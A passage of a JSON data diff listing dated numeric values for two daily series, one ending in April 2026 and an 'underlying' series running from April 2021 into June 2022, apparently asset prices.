46.148393649561655 + ], + [ + "2025-02-03", + 42.57524552844846 + ], + [ + "2025-02-04", + 45.13615918047478 + ], + [ + "2025-02-05", + 49.73392028616163 + ], + [ + "2025-02-06", + 49.42520215333406 + ], + [ + "2025-02-07", + 45.80355278993646 + ], + [ + "2025-02-10", + 49.116485069746396 + ], + [ + "2025-02-11", + 49.35210787375329 + ], + [ + "2025-02-12", + 49.65338440145582 + ], + [ + "2025-02-13", + 53.038022484049684 + ], + [ + "2025-02-14", + 53.32588214359672 + ], + [ + "2025-02-18", + 57.795397781830594 + ], + [ + "2025-02-19", + 61.818314207014396 + ], + [ + "2025-02-20", + 62.37159749690795 + ], + [ + "2025-02-21", + 51.76546985105649 + ], + [ + "2025-02-24", + 45.57378557715217 + ], + [ + "2025-02-25", + 41.04106184420489 + ], + [ + "2025-02-26", + 45.83893705971205 + ], + [ + "2025-02-27", + 35.310892196456365 + ], + [ + "2025-02-28", + 39.18689912808314 + ], + [ + "2025-03-03", + 34.21149788859857 + ], + [ + "2025-03-04", + 35.55071065954043 + ], + [ + "2025-03-05", + 40.61822069833581 + ], + [ + "2025-03-06", + 34.81080074311785 + ], + [ + "2025-03-07", + 40.959452494221615 + ], + [ + "2025-03-10", + 35.162451191430065 + ], + [ + "2025-03-11", + 33.90214682445857 + ], + [ + "2025-03-12", + 38.0211531087257 + ], + [ + "2025-03-13", + 37.40000787256271 + ], + [ + "2025-03-14", + 43.505605418304114 + ], + [ + "2025-03-17", + 46.59898992702624 + ], + [ + "2025-03-18", + 44.457173311987276 + ], + [ + "2025-03-19", + 46.073118767326314 + ], + [ + "2025-03-20", + 44.69000348184537 + ], + [ + "2025-03-21", + 42.88422054140936 + ], + [ + "2025-03-24", + 49.09872887782118 + ], + [ + "2025-03-25", + 48.04321713065202 + ], + [ + "2025-03-26", + 42.92236633586472 + ], + [ + "2025-03-27", + 39.79952049441089 + ], + [ + "2025-03-28", + 35.60428010971488 + ], + [ + "2025-03-31", + 35.25715370733491 + ], + [ + "2025-04-01", + 35.390152487386956 + ], + [ + "2025-04-02", + 37.07480591102039 + ], + [ + "2025-04-03", + 25.68012870464007 + ], + [ + "2025-04-04", + 21.042940120849423 + ], + [ + "2025-04-07", + 25.202085372694796 + ], + [ + "2025-04-08", + 22.91312156758707 + ], + [ + "2025-04-09", + 46.424749454577594 + ], + [ + "2025-04-10", + 39.630940612802924 + ], + [ + "2025-04-11", + 41.85907436559872 + ], + [ + "2025-04-14", + 42.572009691144714 + ], + [ + "2025-04-15", + 43.04047675571745 + ], + [ + "2025-04-16", + 39.73652274224877 + ], + [ + "2025-04-17", + 39.33010767049388 + ], + [ + "2025-04-21", + 37.88452228819369 + ], + [ + "2025-04-22", + 40.459942891656326 + ], + [ + "2025-04-23", + 45.26352346808894 + ], + [ + "2025-04-24", + 51.92050288338013 + ], + [ + "2025-04-25", + 53.02015800273523 + ], + [ + "2025-04-28", + 52.77914090449679 + ], + [ + "2025-04-29", + 51.280525408038585 + ], + [ + "2025-04-30", + 52.265967511329514 + ], + [ + "2025-05-01", + 52.05284026175724 + ], + [ + "2025-05-02", + 56.9255389013595 + ], + [ + "2025-05-05", + 55.54731020837326 + ], + [ + "2025-05-06", + 53.8173284728643 + ], + [ + "2025-05-07", + 56.4696706558795 + ], + [ + "2025-05-08", + 57.82574829272036 + ], + [ + "2025-05-09", + 59.58060187331601 + ], + [ + "2025-05-12", + 68.51411431396636 + ], + [ + "2025-05-13", + 71.39316509287494 + ], + [ + "2025-05-14", + 71.87744116458856 + ], + [ + "2025-05-15", + 70.1636493341006 + ], + [ + "2025-05-16", + 69.79998419414335 + ], + [ + "2025-05-19", + 68.06327807931319 + ], + [ + "2025-05-20", + 67.62441276273633 + ], + [ + "2025-05-21", + 62.23011338873302 + ], + [ + "2025-05-22", + 59.6863269984232 + ], + [ + "2025-05-23", + 55.61838836571014 + ], + [ + "2025-05-27", + 61.569328289396786 + ], + [ + "2025-05-28", + 60.21281335989348 + ], + [ + "2025-05-29", + 60.96264067346271 + ], + [ + "2025-05-30", + 55.46644471115344 + ], + [ + "2025-06-02", + 58.46882690563074 + ], + [ + "2025-06-03", + 63.29050476011084 + ], + [ + "2025-06-04", + 65.72808892699217 + ], + [ + "2025-06-05", + 64.41001227761019 + ], + [ + "2025-06-06", + 65.5939527656507 + ], + [ + "2025-06-09", + 69.45755142665328 + ], + [ + "2025-06-10", + 72.60253800941541 + ], + [ + "2025-06-11", + 71.36499385186247 + ], + [ + "2025-06-12", + 71.57780615688321 + ], + [ + "2025-06-13", + 62.10193523200264 + ], + [ + "2025-06-16", + 67.56244470796366 + ], + [ + "2025-06-17", + 64.95687476214187 + ], + [ + "2025-06-18", + 65.6852907631433 + ], + [ + "2025-06-20", + 63.44685259337552 + ], + [ + "2025-06-23", + 64.6977447851623 + ], + [ + "2025-06-24", + 71.20833635582147 + ], + [ + "2025-06-25", + 72.5476145922072 + ], + [ + "2025-06-26", + 73.70861251046455 + ], + [ + "2025-06-27", + 73.33150808851582 + ], + [ + "2025-06-30", + 73.02497845135738 + ], + [ + "2025-07-01", + 70.87150806384066 + ], + [ + "2025-07-02", + 74.28887578390326 + ], + [ + "2025-07-03", + 75.12331178633721 + ], + [ + "2025-07-07", + 66.31570177492435 + ], + [ + "2025-07-08", + 70.09191601728996 + ], + [ + "2025-07-09", + 70.69705551630365 + ], + [ + "2025-07-10", + 72.55978176563805 + ], + [ + "2025-07-11", + 71.7912263511759 + ], + [ + "2025-07-14", + 67.07946274552845 + ], + [ + "2025-07-15", + 69.33055882456627 + ], + [ + "2025-07-16", + 67.95089377070624 + ], + [ + "2025-07-17", + 68.8863807740532 + ], + [ + "2025-07-18", + 69.09308337200069 + ], + [ + "2025-07-21", + 69.33443373625565 + ], + [ + "2025-07-22", + 61.33904123480362 + ], + [ + "2025-07-23", + 58.20202357102652 + ], + [ + "2025-07-24", + 57.138851929658635 + ], + [ + "2025-07-25", + 57.09389957109835 + ], + [ + "2025-07-28", + 63.58464039176111 + ], + [ + "2025-07-29", + 64.19428107322949 + ], + [ + "2025-07-30", + 66.60280810840644 + ], + [ + "2025-07-31", + 50.22896701492752 + ], + [ + "2025-08-01", + 45.94398049046777 + ], + [ + "2025-08-04", + 51.03864984380205 + ], + [ + "2025-08-05", + 48.440307065447556 + ], + [ + "2025-08-06", + 45.73750931078815 + ], + [ + "2025-08-07", + 52.00240694273051 + ], + [ + "2025-08-08", + 54.91287870585278 + ], + [ + "2025-08-11", + 54.11216486521892 + ], + [ + "2025-08-12", + 63.712739836669876 + ], + [ + "2025-08-13", + 67.25419408830126 + ], + [ + "2025-08-14", + 67.49296805715467 + ], + [ + "2025-08-15", + 57.40217894515727 + ], + [ + "2025-08-18", + 58.2454175231147 + ], + [ + "2025-08-19", + 52.28995358415062 + ], + [ + "2025-08-20", + 50.288038909262674 + ], + [ + "2025-08-21", + 48.33743447959565 + ], + [ + "2025-08-22", + 57.08071479289017 + ], + [ + "2025-08-25", + 56.19799052410707 + ], + [ + "2025-08-26", + 58.95575310319517 + ], + [ + "2025-08-27", + 59.53032450066265 + ], + [ + "2025-08-28", + 60.98287583977115 + ], + [ + "2025-08-29", + 49.540873928707974 + ], + [ + "2025-09-02", + 46.31769731976855 + ], + [ + "2025-09-03", + 44.865809407493174 + ], + [ + "2025-09-04", + 48.621139889801306 + ], + [ + "2025-09-05", + 52.63923333570434 + ], + [ + "2025-09-08", + 55.00756030350601 + ], + [ + "2025-09-09", + 55.28847090024955 + ], + [ + "2025-09-10", + 60.79863559032827 + ], + [ + "2025-09-11", + 62.75770966892962 + ], + [ + "2025-09-12", + 63.268970716722436 + ], + [ + "2025-09-15", + 65.70272035231565 + ], + [ + "2025-09-16", + 67.13972391251666 + ], + [ + "2025-09-17", + 67.02532278973445 + ], + [ + "2025-09-18", + 75.2436471192461 + ], + [ + "2025-09-19", + 71.60801716257396 + ], + [ + "2025-09-22", + 74.66824771989624 + ], + [ + "2025-09-23", + 73.97610755108909 + ], + [ + "2025-09-24", + 73.04195744881659 + ], + [ + "2025-09-25", + 71.01600819993644 + ], + [ + "2025-09-26", + 71.598014467055 + ], + [ + "2025-09-29", + 71.70173433477751 + ], + [ + "2025-09-30", + 73.94572498745488 + ], + [ + "2025-10-01", + 78.35215574788779 + ], + [ + "2025-10-02", + 81.75747865829977 + ], + [ + "2025-10-03", + 77.51139371109514 + ], + [ + "2025-10-06", + 82.31427561187179 + ], + [ + "2025-10-07", + 69.95915535736434 + ], + [ + "2025-10-08", + 75.79960416471354 + ], + [ + "2025-10-09", + 73.63822511065779 + ], + [ + "2025-10-10", + 52.07844553851918 + ], + [ + "2025-10-13", + 60.82075581530055 + ], + [ + "2025-10-14", + 55.846052421266656 + ], + [ + "2025-10-15", + 60.92103081938027 + ], + [ + "2025-10-16", + 61.65963001879934 + ], + [ + "2025-10-17", + 60.91021776645283 + ], + [ + "2025-10-20", + 63.72393799090894 + ], + [ + "2025-10-21", + 62.079707434125034 + ], + [ + "2025-10-22", + 55.330010817956605 + ], + [ + "2025-10-23", + 59.85438070024484 + ], + [ + "2025-10-24", + 62.67434913753972 + ], + [ + "2025-10-27", + 66.95513684732057 + ], + [ + "2025-10-28", + 67.13783270874194 + ], + [ + "2025-10-29", + 69.65280655541696 + ], + [ + "2025-10-30", + 65.27576453977471 + ], + [ + "2025-10-31", + 65.90357202652486 + ], + [ + "2025-11-03", + 66.93696945868709 + ], + [ + "2025-11-04", + 55.039196047511346 + ], + [ + "2025-11-05", + 60.748661693881125 + ], + [ + "2025-11-06", + 54.320193218289454 + ], + [ + "2025-11-07", + 52.00037487872076 + ], + [ + "2025-11-10", + 56.84753732206649 + ], + [ + "2025-11-11", + 51.78493888684286 + ], + [ + "2025-11-12", + 54.654581334536516 + ], + [ + "2025-11-13", + 47.695068001806796 + ], + [ + "2025-11-14", + 47.15461123171278 + ], + [ + "2025-11-17", + 44.05416468634571 + ], + [ + "2025-11-18", + 40.27126431448566 + ], + [ + "2025-11-19", + 43.92033498372295 + ], + [ + "2025-11-20", + 36.84649709439475 + ], + [ + "2025-11-21", + 38.98502527387741 + ], + [ + "2025-11-24", + 47.33553240584596 + ], + [ + "2025-11-25", + 47.9047471097736 + ], + [ + "2025-11-26", + 52.78259919123649 + ], + [ + "2025-11-28", + 55.83337069423559 + ], + [ + "2025-12-01", + 55.93652615566284 + ], + [ + "2025-12-02", + 59.303120014418845 + ], + [ + "2025-12-03", + 62.684643478334 + ], + [ + "2025-12-04", + 60.142409015645995 + ], + [ + "2025-12-05", + 61.8311093727373 + ], + [ + "2025-12-08", + 63.61879932988035 + ], + [ + "2025-12-09", + 63.06966751751738 + ], + [ + "2025-12-10", + 65.37275612697037 + ], + [ + "2025-12-11", + 63.51236576193125 + ], + [ + "2025-12-12", + 50.621227793906236 + ], + [ + "2025-12-15", + 49.56233834618102 + ], + [ + "2025-12-16", + 48.53885151426488 + ], + [ + "2025-12-17", + 41.219921672661016 + ], + [ + "2025-12-18", + 46.60265755713683 + ], + [ + "2025-12-19", + 52.00325330408991 + ], + [ + "2025-12-22", + 54.5697335125727 + ], + [ + "2025-12-23", + 55.28532684882948 + ], + [ + "2025-12-24", + 56.07045299656624 + ], + [ + "2025-12-26", + 55.98074045261156 + ], + [ + "2025-12-29", + 55.294804172395686 + ], + [ + "2025-12-30", + 54.89239011926938 + ], + [ + "2025-12-31", + 51.11647255123268 + ], + [ + "2026-01-02", + 60.780374310329655 + ], + [ + "2026-01-05", + 63.48919167741133 + ], + [ + "2026-01-06", + 68.93077361843041 + ], + [ + "2026-01-07", + 65.40111564109824 + ], + [ + "2026-01-08", + 60.298059430640734 + ], + [ + "2026-01-09", + 65.34357733846736 + ], + [ + "2026-01-12", + 66.13452103934888 + ], + [ + "2026-01-13", + 67.62943110814635 + ], + [ + "2026-01-14", + 66.13735426248638 + ], + [ + "2026-01-15", + 68.94156875622281 + ], + [ + "2026-01-16", + 71.45386514599682 + ], + [ + "2026-01-20", + 65.85887917309549 + ], + [ + "2026-01-21", + 71.01058537838671 + ], + [ + "2026-01-22", + 71.24014235885895 + ], + [ + "2026-01-23", + 66.97273747216943 + ], + [ + "2026-01-26", + 65.23006928731333 + ], + [ + "2026-01-27", + 69.41596290493703 + ], + [ + "2026-01-28", + 73.44728569110433 + ], + [ + "2026-01-29", + 73.71382216272822 + ], + [ + "2026-01-30", + 59.481853613308125 + ], + [ + "2026-02-02", + 62.81340840767702 + ], + [ + "2026-02-03", + 57.2230436178724 + ], + [ + "2026-02-04", + 47.3911791918422 + ], + [ + "2026-02-05", + 47.676666933521304 + ], + [ + "2026-02-06", + 57.44737681411477 + ], + [ + "2026-02-09", + 59.413976060975656 + ], + [ + "2026-02-10", + 58.49815002510524 + ], + [ + "2026-02-11", + 62.56521326932197 + ], + [ + "2026-02-12", + 56.63582882165936 + ], + [ + "2026-02-13", + 58.18589438041465 + ], + [ + "2026-02-17", + 57.79166240594225 + ], + [ + "2026-02-18", + 59.79297830224506 + ], + [ + "2026-02-19", + 58.175478316399946 + ], + [ + "2026-02-20", + 60.17777980120757 + ], + [ + "2026-02-23", + 58.00366227936947 + ], + [ + "2026-02-24", + 61.035692836382424 + ], + [ + "2026-02-25", + 64.21263367689434 + ], + [ + "2026-02-26", + 55.11782763299624 + ], + [ + "2026-02-27", + 51.92835922714336 + ], + [ + "2026-03-02", + 51.756709495959626 + ], + [ + "2026-03-03", + 41.203030070502706 + ], + [ + "2026-03-04", + 45.85695226486841 + ], + [ + "2026-03-05", + 43.77064501879787 + ], + [ + "2026-03-06", + 36.94643852936485 + ], + [ + "2026-03-09", + 45.243347080681545 + ], + [ + "2026-03-10", + 46.67704341344938 + ], + [ + "2026-03-11", + 48.624396880866136 + ], + [ + "2026-03-12", + 42.55264207442678 + ], + [ + "2026-03-13", + 43.27696998482739 + ], + [ + "2026-03-16", + 47.39227220854091 + ], + [ + "2026-03-17", + 49.00179789768816 + ], + [ + "2026-03-18", + 47.826555468223255 + ], + [ + "2026-03-19", + 49.107510397972064 + ], + [ + "2026-03-20", + 44.382792092670876 + ], + [ + "2026-03-23", + 47.280889741698616 + ], + [ + "2026-03-24", + 50.30859809510765 + ], + [ + "2026-03-25", + 53.07956396696775 + ], + [ + "2026-03-26", + 43.05509540962723 + ], + [ + "2026-03-27", + 40.36682187005555 + ], + [ + "2026-03-30", + 34.459714155531614 + ], + [ + "2026-03-31", + 46.15583670796938 + ], + [ + "2026-04-01", + 51.07853364785579 + ], + [ + "2026-04-02", + 51.594664228941234 + ], + [ + "2026-04-06", + 53.79751040626437 + ], + [ + "2026-04-07", + 55.57236188039677 + ], + [ + "2026-04-08", + 64.62495366165548 + ], + [ + "2026-04-09", + 67.23828969659354 + ], + [ + "2026-04-10", + 69.58183777483283 + ], + [ + "2026-04-13", + 71.44228083609076 + ], + [ + "2026-04-14", + 73.48901503621677 + ], + [ + "2026-04-15", + 73.64863501224946 + ], + [ + "2026-04-16", + 74.72956286155875 + ], + [ + "2026-04-17", + 77.13940471610623 + ], + [ + "2026-04-20", + 77.57360294062246 + ], + [ + "2026-04-21", + 78.33234484068089 + ], + [ + "2026-04-22", + 80.7917989728823 + ], + [ + "2026-04-23", + 82.56845325737204 + ] + ], + "underlying": [ + [ + "2021-04-16", + 41.475955963134766 + ], + [ + "2021-04-19", + 38.419830322265625 + ], + [ + "2021-04-20", + 36.586158752441406 + ], + [ + "2021-04-21", + 39.53556442260742 + ], + [ + "2021-04-22", + 36.848121643066406 + ], + [ + "2021-04-23", + 38.95344924926758 + ], + [ + "2021-04-26", + 40.952056884765625 + ], + [ + "2021-04-27", + 40.10797119140625 + ], + [ + "2021-04-28", + 38.245201110839844 + ], + [ + "2021-04-29", + 39.10868835449219 + ], + [ + "2021-04-30", + 35.80030822753906 + ], + [ + "2021-05-03", + 34.548744201660156 + ], + [ + "2021-05-04", + 32.957618713378906 + ], + [ + "2021-05-05", + 33.52033615112305 + ], + [ + "2021-05-06", + 34.34500503540039 + ], + [ + "2021-05-07", + 35.82941436767578 + ], + [ + "2021-05-10", + 30.978418350219727 + ], + [ + "2021-05-11", + 31.15304946899414 + ], + [ + "2021-05-12", + 27.291662216186523 + ], + [ + "2021-05-13", + 28.455904006958008 + ], + [ + "2021-05-14", + 30.978418350219727 + ], + [ + "2021-05-17", + 30.17315673828125 + ], + [ + "2021-05-18", + 29.387292861938477 + ], + [ + "2021-05-19", + 31.0948429107666 + ], + [ + "2021-05-20", + 33.60765075683594 + ], + [ + "2021-05-21", + 33.122554779052734 + ], + [ + "2021-05-24", + 35.44133377075195 + ], + [ + "2021-05-25", + 35.83910369873047 + ], + [ + "2021-05-26", + 36.071956634521484 + ], + [ + "2021-05-27", + 36.731693267822266 + ], + [ + "2021-05-28", + 37.6242790222168 + ], + [ + "2021-06-01", + 37.197391510009766 + ], + [ + "2021-06-02", + 38.02205276489258 + ], + [ + "2021-06-03", + 36.013736724853516 + ], + [ + "2021-06-04", + 38.555667877197266 + ], + [ + "2021-06-07", + 37.750396728515625 + ], + [ + "2021-06-08", + 37.032447814941406 + ], + [ + "2021-06-09", + 36.57646179199219 + ], + [ + "2021-06-10", + 37.87653350830078 + ], + [ + "2021-06-11", + 38.31311798095703 + ], + [ + "2021-06-14", + 39.94303894042969 + ], + [ + "2021-06-15", + 38.84672164916992 + ], + [ + "2021-06-16", + 38.01235580444336 + ], + [ + "2021-06-17", + 39.10868835449219 + ], + [ + "2021-06-18", + 36.20778274536133 + ], + [ + "2021-06-21", + 36.983943939208984 + ], + [ + "2021-06-22", + 37.44963455200195 + ], + [ + "2021-06-23", + 37.88621520996094 + ], + [ + "2021-06-24", + 39.85572814941406 + ], + [ + "2021-06-25", + 39.44824981689453 + ], + [ + "2021-06-28", + 42.34914016723633 + ], + [ + "2021-06-29", + 43.309635162353516 + ], + [ + "2021-06-30", + 43.21261215209961 + ], + [ + "2021-07-01", + 41.30132293701172 + ], + [ + "2021-07-02", + 42.028968811035156 + ], + [ + "2021-07-06", + 41.75731658935547 + ], + [ + "2021-07-07", + 40.010963439941406 + ], + [ + "2021-07-08", + 38.59446334838867 + ], + [ + "2021-07-09", + 40.52516555786133 + ], + [ + "2021-07-12", + 42.03868103027344 + ], + [ + "2021-07-13", + 41.34983825683594 + ], + [ + "2021-07-14", + 40.90354537963867 + ], + [ + "2021-07-15", + 38.245201110839844 + ], + [ + "2021-07-16", + 35.66447448730469 + ], + [ + "2021-07-19", + 35.742088317871094 + ], + [ + "2021-07-20", + 37.197391510009766 + ], + [ + "2021-07-21", + 40.602779388427734 + ], + [ + "2021-07-22", + 39.525856018066406 + ], + [ + "2021-07-23", + 40.31172180175781 + ], + [ + "2021-07-26", + 40.21470642089844 + ], + [ + "2021-07-27", + 37.98324203491211 + ], + [ + "2021-07-28", + 39.95274353027344 + ], + [ + "2021-07-29", + 42.15509033203125 + ], + [ + "2021-07-30", + 43.06708908081055 + ], + [ + "2021-08-02", + 43.862648010253906 + ], + [ + "2021-08-03", + 44.599998474121094 + ], + [ + "2021-08-04", + 46.19111633300781 + ], + [ + "2021-08-05", + 45.764225006103516 + ], + [ + "2021-08-06", + 45.24032211303711 + ], + [ + "2021-08-09", + 44.774627685546875 + ], + [ + "2021-08-10", + 43.12529754638672 + ], + [ + "2021-08-11", + 42.853641510009766 + ], + [ + "2021-08-12", + 41.34983825683594 + ], + [ + "2021-08-13", + 42.184200286865234 + ], + [ + "2021-08-16", + 41.728206634521484 + ], + [ + "2021-08-17", + 39.25420379638672 + ], + [ + "2021-08-18", + 37.50784683227539 + ], + [ + "2021-08-19", + 38.44894027709961 + ], + [ + "2021-08-20", + 39.225101470947266 + ], + [ + "2021-08-23", + 42.38794708251953 + ], + [ + "2021-08-24", + 42.4267578125 + ], + [ + "2021-08-25", + 43.44546127319336 + ], + [ + "2021-08-26", + 43.34843444824219 + ], + [ + "2021-08-27", + 45.89036560058594 + ], + [ + "2021-08-30", + 46.31724548339844 + ], + [ + "2021-08-31", + 45.1627082824707 + ], + [ + "2021-09-01", + 44.59029006958008 + ], + [ + "2021-09-02", + 44.920166015625 + ], + [ + "2021-09-03", + 45.8321418762207 + ], + [ + "2021-09-07", + 45.376155853271484 + ], + [ + "2021-09-08", + 43.610389709472656 + ], + [ + "2021-09-09", + 44.192508697509766 + ], + [ + "2021-09-10", + 45.20152282714844 + ], + [ + "2021-09-13", + 46.443382263183594 + ], + [ + "2021-09-14", + 46.443382263183594 + ], + [ + "2021-09-15", + 47.14191436767578 + ], + [ + "2021-09-16", + 47.607608795166016 + ], + [ + "2021-09-17", + 45.356746673583984 + ], + [ + "2021-09-20", + 42.00956726074219 + ], + [ + "2021-09-21", + 42.30062484741211 + ], + [ + "2021-09-22", + 44.8813591003418 + ], + [ + "2021-09-23", + 46.6665153503418 + ], + [ + "2021-09-24", + 46.520992279052734 + ], + [ + "2021-09-27", + 46.268733978271484 + ], + [ + "2021-09-28", + 40.97145462036133 + ], + [ + "2021-09-29", + 38.924339294433594 + ], + [ + "2021-09-30", + 38.84672164916992 + ], + [ + "2021-10-01", + 38.87582778930664 + ], + [ + "2021-10-04", + 35.91672134399414 + ], + [ + "2021-10-05", + 37.49814224243164 + ], + [ + "2021-10-06", + 37.89592742919922 + ], + [ + "2021-10-07", + 39.18629455566406 + ], + [ + "2021-10-08", + 38.15787887573242 + ], + [ + "2021-10-11", + 37.23619842529297 + ], + [ + "2021-10-12", + 35.94583511352539 + ], + [ + "2021-10-13", + 36.52796173095703 + ], + [ + "2021-10-14", + 39.826622009277344 + ], + [ + "2021-10-15", + 40.59307861328125 + ], + [ + "2021-10-18", + 41.582679748535156 + ], + [ + "2021-10-19", + 43.10588836669922 + ], + [ + "2021-10-20", + 42.88274383544922 + ], + [ + "2021-10-21", + 44.2313117980957 + ], + [ + "2021-10-22", + 42.737213134765625 + ], + [ + "2021-10-25", + 43.717124938964844 + ], + [ + "2021-10-26", + 43.620094299316406 + ], + [ + "2021-10-27", + 42.77601623535156 + ], + [ + "2021-10-28", + 45.599300384521484 + ], + [ + "2021-10-29", + 46.22993087768555 + ], + [ + "2021-11-01", + 48.47108459472656 + ], + [ + "2021-11-02", + 50.275657653808594 + ], + [ + "2021-11-03", + 52.070518493652344 + ], + [ + "2021-11-04", + 57.31928634643555 + ], + [ + "2021-11-05", + 59.09474563598633 + ], + [ + "2021-11-08", + 61.64636993408203 + ], + [ + "2021-11-09", + 61.51054382324219 + ], + [ + "2021-11-10", + 56.22297286987305 + ], + [ + "2021-11-11", + 59.80299377441406 + ], + [ + "2021-11-12", + 61.462039947509766 + ], + [ + "2021-11-15", + 61.31650924682617 + ], + [ + "2021-11-16", + 64.17858123779297 + ], + [ + "2021-11-17", + 62.5971565246582 + ], + [ + "2021-11-18", + 65.95405578613281 + ], + [ + "2021-11-19", + 66.5652847290039 + ], + [ + "2021-11-22", + 63.48004913330078 + ], + [ + "2021-11-23", + 62.810604095458984 + ], + [ + "2021-11-24", + 64.8868408203125 + ], + [ + "2021-11-26", + 59.541046142578125 + ], + [ + "2021-11-29", + 66.37124633789062 + ], + [ + "2021-11-30", + 62.74269104003906 + ], + [ + "2021-12-01", + 61.27769470214844 + ], + [ + "2021-12-02", + 61.36500930786133 + ], + [ + "2021-12-03", + 61.0545539855957 + ], + [ + "2021-12-06", + 60.734378814697266 + ], + [ + "2021-12-07", + 69.84452819824219 + ], + [ + "2021-12-08", + 68.58329010009766 + ], + [ + "2021-12-09", + 63.93604278564453 + ], + [ + "2021-12-10", + 65.58538055419922 + ], + [ + "2021-12-13", + 60.48213195800781 + ], + [ + "2021-12-14", + 59.68656539916992 + ], + [ + "2021-12-15", + 66.0898666381836 + ], + [ + "2021-12-16", + 57.46480941772461 + ], + [ + "2021-12-17", + 57.20286560058594 + ], + [ + "2021-12-20", + 55.83488845825195 + ], + [ + "2021-12-21", + 61.62255096435547 + ], + [ + "2021-12-22", + 63.44696044921875 + ], + [ + "2021-12-23", + 65.41695404052734 + ], + [ + "2021-12-27", + 70.83197021484375 + ], + [ + "2021-12-28", + 68.43499755859375 + ], + [ + "2021-12-29", + 68.90080261230469 + ], + [ + "2021-12-30", + 66.3388671875 + ], + [ + "2021-12-31", + 65.99920654296875 + ], + [ + "2022-01-03", + 69.96827697753906 + ], + [ + "2022-01-04", + 68.9687271118164 + ], + [ + "2022-01-05", + 62.11747741699219 + ], + [ + "2022-01-06", + 63.60224533081055 + ], + [ + "2022-01-07", + 57.97372055053711 + ], + [ + "2022-01-10", + 58.22603988647461 + ], + [ + "2022-01-11", + 61.41876220703125 + ], + [ + "2022-01-12", + 62.670616149902344 + ], + [ + "2022-01-13", + 58.420127868652344 + ], + [ + "2022-01-14", + 62.573585510253906 + ], + [ + "2022-01-18", + 54.324893951416016 + ], + [ + "2022-01-19", + 49.317447662353516 + ], + [ + "2022-01-20", + 44.630252838134766 + ], + [ + "2022-01-21", + 42.41766357421875 + ], + [ + "2022-01-24", + 44.106224060058594 + ], + [ + "2022-01-25", + 39.00173568725586 + ], + [ + "2022-01-26", + 40.87468338012695 + ], + [ + "2022-01-27", + 35.28498077392578 + ], + [ + "2022-01-28", + 37.27436447143555 + ], + [ + "2022-01-31", + 43.26194381713867 + ], + [ + "2022-02-01", + 44.55261993408203 + ], + [ + "2022-02-02", + 47.8812141418457 + ], + [ + "2022-02-03", + 41.369590759277344 + ], + [ + "2022-02-04", + 42.17505645751953 + ], + [ + "2022-02-07", + 42.12654113769531 + ], + [ + "2022-02-08", + 45.22221374511719 + ], + [ + "2022-02-09", + 49.51154708862305 + ], + [ + "2022-02-10", + 45.04754638671875 + ], + [ + "2022-02-11", + 38.37095260620117 + ], + [ + "2022-02-14", + 38.41947937011719 + ], + [ + "2022-02-15", + 44.6496696472168 + ], + [ + "2022-02-16", + 44.73700714111328 + ], + [ + "2022-02-17", + 39.66162872314453 + ], + [ + "2022-02-18", + 38.458290100097656 + ], + [ + "2022-02-22", + 37.46844482421875 + ], + [ + "2022-02-23", + 34.8482780456543 + ], + [ + "2022-02-24", + 38.759124755859375 + ], + [ + "2022-02-25", + 40.54472732543945 + ], + [ + "2022-02-28", + 39.7974967956543 + ], + [ + "2022-03-01", + 35.498477935791016 + ], + [ + "2022-03-02", + 38.933815002441406 + ], + [ + "2022-03-03", + 36.43979263305664 + ], + [ + "2022-03-04", + 33.741981506347656 + ], + [ + "2022-03-07", + 28.70543670654297 + ], + [ + "2022-03-08", + 30.238718032836914 + ], + [ + "2022-03-09", + 33.897254943847656 + ], + [ + "2022-03-10", + 31.781709671020508 + ], + [ + "2022-03-11", + 29.78261947631836 + ], + [ + "2022-03-14", + 27.08481216430664 + ], + [ + "2022-03-15", + 30.5783748626709 + ], + [ + "2022-03-16", + 35.226741790771484 + ], + [ + "2022-03-17", + 35.8575325012207 + ], + [ + "2022-03-18", + 38.01189041137695 + ], + [ + "2022-03-21", + 37.846923828125 + ], + [ + "2022-03-22", + 38.42637252807617 + ], + [ + "2022-03-23", + 35.61160659790039 + ], + [ + "2022-03-24", + 40.85288619995117 + ], + [ + "2022-03-25", + 40.77524185180664 + ], + [ + "2022-03-28", + 41.45466995239258 + ], + [ + "2022-03-29", + 44.24032211303711 + ], + [ + "2022-03-30", + 40.1346435546875 + ], + [ + "2022-03-31", + 37.64018249511719 + ], + [ + "2022-04-01", + 35.22337341308594 + ], + [ + "2022-04-04", + 36.84428024291992 + ], + [ + "2022-04-05", + 31.913591384887695 + ], + [ + "2022-04-06", + 29.61325454711914 + ], + [ + "2022-04-07", + 29.61325454711914 + ], + [ + "2022-04-08", + 27.4585018157959 + ], + [ + "2022-04-11", + 25.711408615112305 + ], + [ + "2022-04-12", + 25.46875762939453 + ], + [ + "2022-04-13", + 27.206146240234375 + ], + [ + "2022-04-14", + 24.857271194458008 + ], + [ + "2022-04-18", + 26.1870059967041 + ], + [ + "2022-04-19", + 27.90498161315918 + ], + [ + "2022-04-20", + 27.662330627441406 + ], + [ + "2022-04-21", + 25.439638137817383 + ], + [ + "2022-04-22", + 23.731365203857422 + ], + [ + "2022-04-25", + 24.915510177612305 + ], + [ + "2022-04-26", + 21.770736694335938 + ], + [ + "2022-04-27", + 21.304847717285156 + ], + [ + "2022-04-28", + 24.828157424926758 + ], + [ + "2022-04-29", + 21.586326599121094 + ], + [ + "2022-05-02", + 23.779897689819336 + ], + [ + "2022-05-03", + 24.37196922302246 + ], + [ + "2022-05-04", + 27.196439743041992 + ], + [ + "2022-05-05", + 23.284887313842773 + ], + [ + "2022-05-06", + 22.6636962890625 + ], + [ + "2022-05-09", + 19.140392303466797 + ], + [ + "2022-05-10", + 20.470129013061523 + ], + [ + "2022-05-11", + 18.58714485168457 + ], + [ + "2022-05-12", + 18.839506149291992 + ], + [ + "2022-05-13", + 21.828975677490234 + ], + [ + "2022-05-16", + 20.741893768310547 + ], + [ + "2022-05-17", + 23.857547760009766 + ], + [ + "2022-05-18", + 20.237178802490234 + ], + [ + "2022-05-19", + 19.90717124938965 + ], + [ + "2022-05-20", + 19.761585235595703 + ], + [ + "2022-05-23", + 20.02364730834961 + ], + [ + "2022-05-24", + 18.538612365722656 + ], + [ + "2022-05-25", + 19.596576690673828 + ], + [ + "2022-05-26", + 21.877506256103516 + ], + [ + "2022-05-27", + 24.517559051513672 + ], + [ + "2022-05-31", + 24.12932014465332 + ], + [ + "2022-06-01", + 23.013118743896484 + ], + [ + "2022-06-02", + 25.429933547973633 + ], + [ + "2022-06-03", + 23.226652145385742 + ], + [ + "2022-06-06", + 23.207242965698242 + ], + [ + "2022-06-07", + 23.876956939697266 + ], + [ + "2022-06-08", + 22.236629486083984 + ], + [ + "2022-06-09", + 20.470129013061523 + ], + [ + "2022-06-10", + 18.257137298583984 + ], + [ + 